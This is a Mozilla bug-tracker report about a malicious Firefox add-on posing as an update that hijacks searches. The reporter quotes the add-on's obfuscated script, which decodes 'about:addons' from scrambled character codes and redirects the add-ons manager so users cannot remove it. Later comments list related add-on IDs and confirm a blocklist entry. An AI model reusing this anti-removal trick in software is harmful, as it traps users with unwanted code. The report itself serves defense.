Closed
Bug 1454691
Opened 6 years ago
Closed 6 years ago
Malicious add-on redirects away from the add-on page to keep users from uninstalling it
Categories
(Toolkit :: Blocklist Policy Requests, defect)
Tracking
()
RESOLVED
FIXED
People
(Reporter: gregory.hunt, Assigned: TheOne)
Details
Attachments
(1 file)
|
5.63 KB,
application/x-xpinstall
|
Details |
User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Build ID: 20180323154952
Steps to reproduce:
A user in my office accidentally installed an add-on that billed itself as a Firefox update, which then hijacked his searches. The add-on itself makes sure you can't go to the add-ons screen in Firefox to remove it, without starting Firefox in safe mode. It seems to me that add-ons shouldn't be able to hijack the add-ons interface in Firefox.
Here is the code it it uses to hijack the add-ons page:
var tArr = [115, 100, 98, 116, 97, 100, 111, 117, 97, 111, 58, 110];
var tArrI = [8, 2, 6, 7, 3, 10, 4, 1, 5, 9, 11, 0];
var xtraRedirect = "";
for(var i=0; i<tArr.length; i++)
xtraRedirect += String.fromCharCode(tArr[tArrI[i]]);
browser.tabs.onUpdated.addListener(function (tabId, changeInfo, tab) {
if(changeInfo.url == xtraRedirect){
browser.tabs.update(tabId, {url: "https://www.google.com/"});
}
});
Actual results:
The user click on Tools->Add-ons and was redirected to Google.
Expected results:
The add-ons manager for Firefox should have appeared, allowing the user to remove the malicious "Update" add-on.
|
||
Updated•6 years ago
|
Severity: normal → major
Component: Untriaged → WebExtensions: Untriaged
Product: Firefox → Toolkit
|
Assignee | |
Updated•6 years ago
|
Assignee: nobody → awagner
Status: UNCONFIRMED → ASSIGNED
Component: WebExtensions: Untriaged → Blocklisting
Ever confirmed: true
|
|
Assignee | |
Comment 1•6 years ago
|
||
The add-on GUID is {6ecb9f49-90f0-43a1-8f8a-e809ea4f732b}
|
||
Comment 2•6 years ago
|
||
Found some related ones:
+--------+----------------------------------------+-----------------+
| id | guid | Name |
+--------+----------------------------------------+-----------------+
| 673685 | @googledashboard | GoogleDashboard |
| 673890 | @smashdashboard | SmashDasboard |
| 688947 | @smash_tv | SmashTV |
| 689935 | @smash_mov | SmashMov |
| 690271 | @smashmovs | Smashmovs |
| 702315 | @smashtvs | Smashtvs |
| 739853 | @FirefoxUpdate | FirefoxUpdate |
| 946448 | {92b9e511-ac81-4d47-9b8f-f92dc872447e} | Big Searches |
| 949744 | {3c841114-da8c-44ea-8303-78264edfe60b} | Big Searches |
| 951089 | {116a0754-20eb-4fe5-bd35-575867a0b89e} | FF Update |
| 952976 | {6e6ff0fd-4ae4-49ae-ac0c-e2527e12359b} | Big Search |
| 960408 | {f992ac88-79d3-4960-870e-92c342ed3491} | Update |
| 960411 | {6ecb9f49-90f0-43a1-8f8a-e809ea4f732b} | Update |
| 962562 | {a512297e-4d3a-468c-bd1a-f77bd093f925} | NewtabTV |
| 962894 | {08c28c16-9fb6-4b32-9868-db37c1668f94} | Update |
| 963453 | {b4ab1a1d-e137-4c59-94d5-4f509358a81d} | Update |
| 963455 | {feedf4f8-08c1-451f-a717-f08233a64ec9} | Update |
+--------+----------------------------------------+-----------------+
Andreas, please stage these blocks when the staged blocks in bug 1423384 are cleared.Flags: needinfo?(awagner)
|
|
||
Comment 3•6 years ago
|
||
(In reply to gregory.hunt from comment #0) > It seems to me that add-ons shouldn't be able to hijack the add-ons interface in Firefox. I agree, which is why I placed this in Webextensions. Andreas, an explanation would be welcome. Add-ons are prevented from interfering with Mozilla sites like addons.mozilla.org, so I would think preventing them from interfering with the Add-ons Manager would be both possible and desirable. This blocklisting game of whack-a-mole is less than ideal.
|
|
Assignee | |
Comment 4•6 years ago
|
||
(In reply to Gingerbread Man from comment #3) > (In reply to gregory.hunt from comment #0) > > It seems to me that add-ons shouldn't be able to hijack the add-ons interface in Firefox. > > I agree, which is why I placed this in Webextensions. Andreas, an > explanation would be welcome. I think Jorge or Mike Conca can provide a more authoritative answer on whether we'd want to do that or now. Personally, I would be in favor of it, but it's not my call. This is also getting a little bit off-topic for this bug, maybe you can take it to dev-addons or open a separate bug?
|
|
Assignee | |
Comment 5•6 years ago
|
||
Ooops, that should have been "...on whether we'd want to do that or not."
Flags: needinfo?(awagner)
|
|
Assignee | |
Comment 6•6 years ago
|
||
Philipp, the block has been stage, could you please review and push?
Flags: needinfo?(philipp)
|
|
Assignee | |
Comment 7•6 years ago
|
||
Philipp approved it. The block is live.
Status: ASSIGNED → RESOLVED
Closed: 6 years ago
Resolution: --- → FIXED
|
|
||
Comment 8•6 years ago
|
||
(In reply to Andreas Wagner [:TheOne] [use NI] from comment #4) > open a separate bug? Bug 1455350
|
|
Assignee | |
Updated•6 years ago
|
Flags: needinfo?(philipp)
You need to log in
before you can comment on or make changes to this bug.
Description
•